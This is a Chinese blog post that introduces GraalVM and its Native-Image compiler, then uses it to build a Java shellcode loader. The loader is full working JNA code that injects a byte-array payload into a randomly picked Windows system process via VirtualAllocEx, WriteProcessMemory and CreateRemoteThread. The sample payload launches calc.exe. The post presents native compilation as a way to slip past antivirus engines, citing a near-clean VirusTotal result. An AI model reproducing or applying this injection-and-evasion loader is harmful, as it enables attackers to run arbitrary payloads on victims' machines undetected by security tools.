使用Graalvm加载Shellcode - admin-神风
Graalvm介绍
介绍Graalvm之前,首先就要了解Java编译的JIT和AOT是什么
JIT(Just-in-Time,即时编译)和AOT(Ahead-of-Time,预编译),就像Java常见的是需要什么类,就加载进来编译并解析。而现随着云计算的发展,很多微服务架构都需要提前通过编译转换成原生可执行的,原先的JIT方式在云环境中就存在很多的限制。
AOT带来的好处,可以使Java在虚拟机加载这些二进制文件能直接调用,无需再等编译器运行时再转换成机器码,可以减少性能和内存的消耗。但缺点也很明显,提前编译就意味着对机器的指令要求很高,因此不可以跨平台执行,打破了一次编译到处运行的设计理念,同时也不存在反射等动态调用的能力。
而Graalvm应运而生
Oracle在2019年推出的新一代UVM(通用虚拟机),它在HotSpotVM的基础上进行了大量的优化和改进,主要提供了两大特性:
-
Polyglot:多语言支持,你可以在GraalVM中无缝运行多种语言,包括Java、JS、Ruby、Python甚至是Rust。更重要的是可以通过GraalVM的API来实现语言混编 —— 比如在一段Java代码中无缝引用并调用一个Python实现的模块。
-
HighPerformance:高性能,首先它提供了一个高性能的JIT引擎,让Java语言在GraalVM上执行的时候效率更高速度更快 ;其次就是提供了SubstrateVM,通过Graal Compiler你可以将各种支持的语言(包括Java)编译成本地机器代码,获得更好的性能表现。
安装Graalvm
在https://github.com/graalvm/graalvm-ce-builds/releases地址下载对应版本的安装文件后,解压
需要配置两个系统环境
-
PATH:安装目录下的/bin文件
-
JAVA_HOME:安装目录
设置好之后,运行java -version查看Graalvm是否安装成功
再使用Graalvm Update工具下载Native-Image
而想在Windows上执行Native-Image,首先得安装Visual Studio的环境,用x64 Native Tools Command Prompt命令行来执行
这里我使用Visual Studio 2017的桌面开发环境,安装了MSVC和默认的默认的库类
找到安装目录的\VC\Auxiliary\Build\vcvars64.bat
设置环境变量:
Lib
C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\BuildTools\\VC\\Tools\\MSVC\\14.29.30133\\lib\\x64
C:\\Program Files (x86)\\Windows Kits\\10\\Lib\\10.0.19041.0\\ucrt\\x64
C:\\Program Files (x86)\\Windows Kits\\10\\Lib\\10.0.19041.0\\um\\x64
MSVC
C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\BuildTools\\VC\\Tools\\MSVC\\14.29.30133
Include
C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\BuildTools\\VC\\Tools\\MSVC\\14.29.30133\\include
C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.19041.0\\ucrt
C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.19041.0\\um
C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.19041.0\\shared
设置完成后添加如下路径到PATH中
%MSVC%\\bin\\Hostx64\\x64
但是我这里出现了bug,不知道为啥命令提示符执行没有结果,最后是使用VS Code里的Terminal才成功的。
可以看到Native-Image编译后的程序运行速度快了近39倍!
Java ShellCode Loader
原本是想用rebeyond师傅提出的Shellcode执行方法来弄,后面发现打包成jar包一直报ClassNotFound,把依赖打包进去也不管用,于是就在Github上找到一个ShellCode注入的方法:https://github.com/yzddmr6/Java-Shellcode-Loader
核心原理是用JNA的方法
package executeCode;
import com.sun.jna.Memory;
import com.sun.jna.Native;
import com.sun.jna.Pointer;
import com.sun.jna.platform.win32.Kernel32;
import com.sun.jna.platform.win32.WinBase;
import com.sun.jna.platform.win32.WinDef;
import com.sun.jna.platform.win32.WinNT;
import com.sun.jna.platform.win32.WinNT.HANDLE;
import com.sun.jna.ptr.IntByReference;
import com.sun.jna.win32.StdCallLibrary;
import com.sun.jna.win32.W32APIOptions;
import java.util.Random;
public class Jna {
static byte shellcode\[\] = new byte\[\] //pop calc.exe x64
{
(byte) 0xfc, (byte) 0x48, (byte) 0x83, (byte) 0xe4, (byte) 0xf0, (byte) 0xe8, (byte) 0xc0, (byte) 0x00,
(byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0x51, (byte) 0x41, (byte) 0x50, (byte) 0x52, (byte) 0x51,
(byte) 0x56, (byte) 0x48, (byte) 0x31, (byte) 0xd2, (byte) 0x65, (byte) 0x48, (byte) 0x8b, (byte) 0x52,
(byte) 0x60, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x18, (byte) 0x48, (byte) 0x8b, (byte) 0x52,
(byte) 0x20, (byte) 0x48, (byte) 0x8b, (byte) 0x72, (byte) 0x50, (byte) 0x48, (byte) 0x0f, (byte) 0xb7,
(byte) 0x4a, (byte) 0x4a, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,
(byte) 0xac, (byte) 0x3c, (byte) 0x61, (byte) 0x7c, (byte) 0x02, (byte) 0x2c, (byte) 0x20, (byte) 0x41,
(byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1, (byte) 0xe2, (byte) 0xed,
(byte) 0x52, (byte) 0x41, (byte) 0x51, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x20, (byte) 0x8b,
(byte) 0x42, (byte) 0x3c, (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x8b, (byte) 0x80, (byte) 0x88,
(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x85, (byte) 0xc0, (byte) 0x74, (byte) 0x67,
(byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x50, (byte) 0x8b, (byte) 0x48, (byte) 0x18, (byte) 0x44,
(byte) 0x8b, (byte) 0x40, (byte) 0x20, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0xe3, (byte) 0x56,
(byte) 0x48, (byte) 0xff, (byte) 0xc9, (byte) 0x41, (byte) 0x8b, (byte) 0x34, (byte) 0x88, (byte) 0x48,
(byte) 0x01, (byte) 0xd6, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,
(byte) 0xac, (byte) 0x41, (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1,
(byte) 0x38, (byte) 0xe0, (byte) 0x75, (byte) 0xf1, (byte) 0x4c, (byte) 0x03, (byte) 0x4c, (byte) 0x24,
(byte) 0x08, (byte) 0x45, (byte) 0x39, (byte) 0xd1, (byte) 0x75, (byte) 0xd8, (byte) 0x58, (byte) 0x44,
(byte) 0x8b, (byte) 0x40, (byte) 0x24, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0x66, (byte) 0x41,
(byte) 0x8b, (byte) 0x0c, (byte) 0x48, (byte) 0x44, (byte) 0x8b, (byte) 0x40, (byte) 0x1c, (byte) 0x49,
(byte) 0x01, (byte) 0xd0, (byte) 0x41, (byte) 0x8b, (byte) 0x04, (byte) 0x88, (byte) 0x48, (byte) 0x01,
(byte) 0xd0, (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x58, (byte) 0x5e, (byte) 0x59, (byte) 0x5a,
(byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x59, (byte) 0x41, (byte) 0x5a, (byte) 0x48, (byte) 0x83,
(byte) 0xec, (byte) 0x20, (byte) 0x41, (byte) 0x52, (byte) 0xff, (byte) 0xe0, (byte) 0x58, (byte) 0x41,
(byte) 0x59, (byte) 0x5a, (byte) 0x48, (byte) 0x8b, (byte) 0x12, (byte) 0xe9, (byte) 0x57, (byte) 0xff,
(byte) 0xff, (byte) 0xff, (byte) 0x5d, (byte) 0x48, (byte) 0xba, (byte) 0x01, (byte) 0x00, (byte) 0x00,
(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x8d, (byte) 0x8d,
(byte) 0x01, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0xba, (byte) 0x31, (byte) 0x8b,
(byte) 0x6f, (byte) 0x87, (byte) 0xff, (byte) 0xd5, (byte) 0xbb, (byte) 0xf0, (byte) 0xb5, (byte) 0xa2,
(byte) 0x56, (byte) 0x41, (byte) 0xba, (byte) 0xa6, (byte) 0x95, (byte) 0xbd, (byte) 0x9d, (byte) 0xff,
(byte) 0xd5, (byte) 0x48, (byte) 0x83, (byte) 0xc4, (byte) 0x28, (byte) 0x3c, (byte) 0x06, (byte) 0x7c,
(byte) 0x0a, (byte) 0x80, (byte) 0xfb, (byte) 0xe0, (byte) 0x75, (byte) 0x05, (byte) 0xbb, (byte) 0x47,
(byte) 0x13, (byte) 0x72, (byte) 0x6f, (byte) 0x6a, (byte) 0x00, (byte) 0x59, (byte) 0x41, (byte) 0x89,
(byte) 0xda, (byte) 0xff, (byte) 0xd5, (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e,
(byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00
};
static Kernel32 kernel32;
static IKernel32 iKernel32;
public static String\[\] ProcessArrayx32 = {"C:\\\\Windows\\\\SysWOW64\\\\ARP.exe", "C:\\\\Windows\\\\SysWOW64\\\\at.exe", "C:\\\\Windows\\\\SysWOW64\\\\auditpol.exe", "C:\\\\Windows\\\\SysWOW64\\\\bitsadmin.exe", "C:\\\\Windows\\\\SysWOW64\\\\bootcfg.exe", "C:\\\\Windows\\\\SysWOW64\\\\ByteCodeGenerator.exe", "C:\\\\Windows\\\\SysWOW64\\\\cacls.exe", "C:\\\\Windows\\\\SysWOW64\\\\chcp.com", "C:\\\\Windows\\\\SysWOW64\\\\CheckNetIsolation.exe", "C:\\\\Windows\\\\SysWOW64\\\\chkdsk.exe", "C:\\\\Windows\\\\SysWOW64\\\\choice.exe", "C:\\\\Windows\\\\SysWOW64\\\\cmdkey.exe", "C:\\\\Windows\\\\SysWOW64\\\\comp.exe", "C:\\\\Windows\\\\SysWOW64\\\\diskcomp.com", "C:\\\\Windows\\\\SysWOW64\\\\Dism.exe", "C:\\\\Windows\\\\SysWOW64\\\\esentutl.exe", "C:\\\\Windows\\\\SysWOW64\\\\expand.exe", "C:\\\\Windows\\\\SysWOW64\\\\fc.exe", "C:\\\\Windows\\\\SysWOW64\\\\find.exe", "C:\\\\Windows\\\\SysWOW64\\\\gpresult.exe"};
public static String\[\] ProcessArrayx64 = {"C:\\\\Windows\\\\System32\\\\rundll32.exe", "C:\\\\Windows\\\\System32\\\\find.exe", "C:\\\\Windows\\\\System32\\\\notepad.exe", "C:\\\\Windows\\\\System32\\\\ARP.EXE"};
static {
kernel32 \= (Kernel32) Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE\_OPTIONS);
iKernel32 \= (IKernel32) Native.loadLibrary("kernel32", IKernel32.class);
}
public static void main(String\[\] args) {
Jna jnaLoader \= new Jna();
boolean is64 = true;
System.out.println("\\nShellcode: \\n" + shellcode);
jnaLoader.loadShellCode(shellcode, is64);
}
public void loadShellCode(byte\[\] shellcodeHex, boolean is64) {
String\[\] targetProcessArray \= null;
// java是64位且选择注入64位shellcode
if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
targetProcessArray \= ProcessArrayx64;
} else { //默认注入32位进程
targetProcessArray = ProcessArrayx32;
}
int j = targetProcessArray.length;
byte b = 0;
Random random \= new Random();
int k = b + random.nextInt(j);
String targetProcess \= targetProcessArray\[k\];
this.loadShellCode(shellcodeHex, targetProcess);
}
public void loadShellCode(byte\[\] shellcodeByte, String targetProcess) {
System.out.println("targetProcess: " + targetProcess);
int shellcodeSize = shellcodeByte.length;
IntByReference intByReference \= new IntByReference(0);
Memory memory \= new Memory((long) shellcodeSize);
for (int j = 0; j < shellcodeSize; ++j) {
memory.setByte((long) j, shellcodeByte\[j\]);
}
WinBase.PROCESS\_INFORMATION pROCESS\_INFORMATION \= new WinBase.PROCESS\_INFORMATION();
WinBase.STARTUPINFO sTARTUPINFO \= new WinBase.STARTUPINFO();
sTARTUPINFO.cb \= new WinDef.DWORD((long) pROCESS\_INFORMATION.size());
if (kernel32.CreateProcess(targetProcess, (String) null, (WinBase.SECURITY\_ATTRIBUTES) null, (WinBase.SECURITY\_ATTRIBUTES) null, false, new WinDef.DWORD(4L), (Pointer) null, (String) null, sTARTUPINFO, pROCESS\_INFORMATION)) {
Pointer pointer \= iKernel32.VirtualAllocEx(pROCESS\_INFORMATION.hProcess, Pointer.createConstant(0), shellcodeSize, 4096, 64);
iKernel32.WriteProcessMemory(pROCESS\_INFORMATION.hProcess, pointer, memory, shellcodeSize, intByReference);
HANDLE hANDLE \= iKernel32.CreateRemoteThread(pROCESS\_INFORMATION.hProcess, (Object) null, 0, pointer, 0, 0, (Object) null);
kernel32.WaitForSingleObject(hANDLE, \-1);
}
}
interface IKernel32 extends StdCallLibrary {
Pointer VirtualAlloc(Pointer var1, int var2, int var3, int var4);
HANDLE CreateThread(Object var1, int var2, Pointer var3, int var4, int var5, Object var6);
Pointer VirtualAllocEx(HANDLE var1, Pointer var2, int var3, int var4, int var5);
HANDLE CreateRemoteThread(HANDLE var1, Object var2, int var3, Pointer var4, int var5, int var6, Object var7);
boolean WriteProcessMemory(WinNT.HANDLE param1HANDLE, Pointer param1Pointer1, Pointer param1Pointer2, int param1Int, IntByReference param1IntByReference);
boolean ReadProcessMemory(Pointer var1, int var2, Pointer var3, int var4, IntByReference var5);
int VirtualQueryEx(Pointer var1, Pointer var2, Pointer var3, int var4);
Pointer OpenProcess(int var1, boolean var2, int var3);
Pointer GetCurrentProcess();
}
}
上述代码中的字节数组是弹出Calc.exe的ShellCode
随着依赖包和Main方法一起打包到Jar包中,并用Native-image将jar包编译成exe
native\-image -jar Loader.jar
传到VirusTotal上,只有一个上报异常
相关推荐
